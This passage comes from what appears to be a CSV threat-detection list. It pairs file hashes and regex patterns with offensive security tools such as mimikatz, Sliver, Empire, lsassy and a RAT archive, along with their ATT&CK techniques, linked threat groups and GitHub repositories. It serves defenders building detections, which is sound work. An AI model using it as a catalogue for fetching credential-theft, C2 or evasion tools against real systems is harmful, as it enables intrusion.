TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29253" "*77873f1f629ff4f8635b50544849c7904db358ee87733f42f3bcb19c87da2eab*",".{0,1000}77873f1f629ff4f8635b50544849c7904db358ee87733f42f3bcb19c87da2eab.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","29254" "*7787d9292fae90d6ac9b4b9e691ae56a08e199ea96a974d45c26bc5cb30f3d8e*",".{0,1000}7787d9292fae90d6ac9b4b9e691ae56a08e199ea96a974d45c26bc5cb30f3d8e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29255" "*778b2aafed8b0255a30082314f27182bb6f88c3aed0ecbda92aa092515acf955*",".{0,1000}778b2aafed8b0255a30082314f27182bb6f88c3aed0ecbda92aa092515acf955.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29257" "*77922162f5272f854af4755ff5bb43331b2e63f7cedc7efc30dd6bb3549b2cd0*",".{0,1000}77922162f5272f854af4755ff5bb43331b2e63f7cedc7efc30dd6bb3549b2cd0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29259" "*7794d2cb665c264f4cda6652c30e727965a5f5ea10e258df5d00d9765ee24910*",".{0,1000}7794d2cb665c264f4cda6652c30e727965a5f5ea10e258df5d00d9765ee24910.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29260" "*7798bda9fc4f194ab8e0d876a27326abe016f35eddd6799696670c45888475c0*",".{0,1000}7798bda9fc4f194ab8e0d876a27326abe016f35eddd6799696670c45888475c0.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","29261" "*779eedf10f0ae805b84e8cc0cd97f4861f0818eefa4ccf087d1c875db1d1c5e3*",".{0,1000}779eedf10f0ae805b84e8cc0cd97f4861f0818eefa4ccf087d1c875db1d1c5e3.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#filehash","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","29262" "*77aacde6d6933ca07fef4f91b408dc58d12dc222dc5212fd291ac49c2b81a635*",".{0,1000}77aacde6d6933ca07fef4f91b408dc58d12dc222dc5212fd291ac49c2b81a635.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT 
samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29263" "*77b1042ad03c451d66b967673277d153869dafec091c3b43167c309722af44db*",".{0,1000}77b1042ad03c451d66b967673277d153869dafec091c3b43167c309722af44db.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","29264" "*77b587e37104e7a1e8858e76cbfa2580d8633ce37c836e28c3ebbdfcf3db0571*",".{0,1000}77b587e37104e7a1e8858e76cbfa2580d8633ce37c836e28c3ebbdfcf3db0571.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29265" "*77b5efcc93bb859a7c5667dd2e21c7cc2fb7d9bef1237875bb4dbfb1c96cc194*",".{0,1000}77b5efcc93bb859a7c5667dd2e21c7cc2fb7d9bef1237875bb4dbfb1c96cc194.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29266" "*77b681a78da38b33f408ccdc747438550186a348f670d2faaa05ef75f9337973*",".{0,1000}77b681a78da38b33f408ccdc747438550186a348f670d2faaa05ef75f9337973.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29267" "*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*",".{0,1000}77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","29268" "*77c88d4c67b3600e78f82c938d2ef72525277647a27692b2114c9688bf1da121*",".{0,1000}77c88d4c67b3600e78f82c938d2ef72525277647a27692b2114c9688bf1da121.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","29271" "*77c88d4c67b3600e78f82c938d2ef72525277647a27692b2114c9688bf1da121*",".{0,1000}77c88d4c67b3600e78f82c938d2ef72525277647a27692b2114c9688bf1da121.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","29272" "*77cfad99621ef6951ec4809a6641e2d7623238b66afa3f6e993703eeff161da6*",".{0,1000}77cfad99621ef6951ec4809a6641e2d7623238b66afa3f6e993703eeff161da6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR 
- FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29273" "*77cfad99621ef6951ec4809a6641e2d7623238b66afa3f6e993703eeff161da6*",".{0,1000}77cfad99621ef6951ec4809a6641e2d7623238b66afa3f6e993703eeff161da6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29274" 
"*77d2aa31773df8903d877f30db405b48896581f762b0d70e73e2c1014ea7b378*",".{0,1000}77d2aa31773df8903d877f30db405b48896581f762b0d70e73e2c1014ea7b378.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#filehash","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","29275" "*77d5859c1973d0e9aa2d28a0d8cc46ecc6678828b35a728d8c4efebf596fe448*",".{0,1000}77d5859c1973d0e9aa2d28a0d8cc46ecc6678828b35a728d8c4efebf596fe448.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29276" "*77d6df99bd2b655d9f00ac88e6a908a7e3ba23a4f7b181942b9ca3063d7d80ce*",".{0,1000}77d6df99bd2b655d9f00ac88e6a908a7e3ba23a4f7b181942b9ca3063d7d80ce.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29277" "*77db549ca1d8238056074d8abda0c1715bb69f1c0b85795f1680c20960e6a757*",".{0,1000}77db549ca1d8238056074d8abda0c1715bb69f1c0b85795f1680c20960e6a757.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration 
Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29278" "*77de77149c63a656601bc3d0f4c2704ca8e22673abfb1d235e4f45d5e5befb56*",".{0,1000}77de77149c63a656601bc3d0f4c2704ca8e22673abfb1d235e4f45d5e5befb56.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29279" 
"*77e168cc5dfb4dd91c2512029eef1d0d4656df72961132bf0ba125fcaa86072f*",".{0,1000}77e168cc5dfb4dd91c2512029eef1d0d4656df72961132bf0ba125fcaa86072f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29280" "*77ec2daecb8490e270bf628cbd585180731178e4a859e75c833dfcfffabcf34f*",".{0,1000}77ec2daecb8490e270bf628cbd585180731178e4a859e75c833dfcfffabcf34f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29282" "*77efc4024d86cf813ea6f93ef2b98dd4ff8bb8a46f0fd145465786690a27b169*",".{0,1000}77efc4024d86cf813ea6f93ef2b98dd4ff8bb8a46f0fd145465786690a27b169.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","29283" "*77f72dddfd3e604f689b437c0e813ad2935b0ca7eb93b6b46e344b97105ecf05*",".{0,1000}77f72dddfd3e604f689b437c0e813ad2935b0ca7eb93b6b46e344b97105ecf05.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to 
enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","29284" "*77f75c3af77b7963703d621b6bb262309b8100b08e42d5a41ab99b1aa86d2f88*",".{0,1000}77f75c3af77b7963703d621b6bb262309b8100b08e42d5a41ab99b1aa86d2f88.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29285" "*77F955C3-4910-49EA-9CD4-CBF5AD9C071A*",".{0,1000}77F955C3\-4910\-49EA\-9CD4\-CBF5AD9C071A.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","29286" 
"*78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6*",".{0,1000}78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29287" "*7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596*",".{0,1000}7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","#filehash","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","29288" "*780848610f8c2ed5dc266cd51ce1d12f8049f580bba8ad403296dd93fbc22256*",".{0,1000}780848610f8c2ed5dc266cd51ce1d12f8049f580bba8ad403296dd93fbc22256.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29289" "*780af7e91e49cdbbc34d44021232c4bb5df42b1584dd35b13a35c8cb670d2c0e*",".{0,1000}780af7e91e49cdbbc34d44021232c4bb5df42b1584dd35b13a35c8cb670d2c0e.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","29291" 
"*780bc4923a0f141eccf843b710cedc117075b51562bce79289fbd43b8335a0e9*",".{0,1000}780bc4923a0f141eccf843b710cedc117075b51562bce79289fbd43b8335a0e9.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","29292" "*780d27ade8e534dc6affd96eeeea3e5ca9bf3e8fc3cc3257597b90f855dd583c*",".{0,1000}780d27ade8e534dc6affd96eeeea3e5ca9bf3e8fc3cc3257597b90f855dd583c.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","29293" "*78177028fe6c048b40b90f696adfdcbcbda0a7c9f678125bbead5b4f116098fc*",".{0,1000}78177028fe6c048b40b90f696adfdcbcbda0a7c9f678125bbead5b4f116098fc.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","29294" "*781a54a1bb3fb0960ce374f79a50ba0870e824a5b2432ee8cb2de3b5b8883128*",".{0,1000}781a54a1bb3fb0960ce374f79a50ba0870e824a5b2432ee8cb2de3b5b8883128.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#filehash","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","29295" "*7820e9465a468401f2ddd41df2e84c2f8b00a4e178a0b9d3cd963824fdcfd31f*",".{0,1000}7820e9465a468401f2ddd41df2e84c2f8b00a4e178a0b9d3cd963824fdcfd31f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","29296" "*7821bc03a533800e3e0ce647b2901934e6bf214209c95262e672f1f04ed1a08c*",".{0,1000}7821bc03a533800e3e0ce647b2901934e6bf214209c95262e672f1f04ed1a08c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29297" "*782420290c7e89565408d3bc60a468e280014e1e37fde06034712defd95dedfd*",".{0,1000}782420290c7e89565408d3bc60a468e280014e1e37fde06034712defd95dedfd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29298" "*782811dcb3f37789df2dc8c60c65b59ac7845b0ba57d79f18d178c0a4cc73aaf*",".{0,1000}782811dcb3f37789df2dc8c60c65b59ac7845b0ba57d79f18d178c0a4cc73aaf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 
- T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29299" "*7828de08232d4013f86d4a83d0ab31a9d78c7b9d57e7d68c24fd90bb71e09f02*",".{0,1000}7828de08232d4013f86d4a83d0ab31a9d78c7b9d57e7d68c24fd90bb71e09f02.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29300" "*782ceb859eaa767d4e24ae709d7ab3c0dea3b450c788e04fb2ce4c085e9e8a91*",".{0,1000}782ceb859eaa767d4e24ae709d7ab3c0dea3b450c788e04fb2ce4c085e9e8a91.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
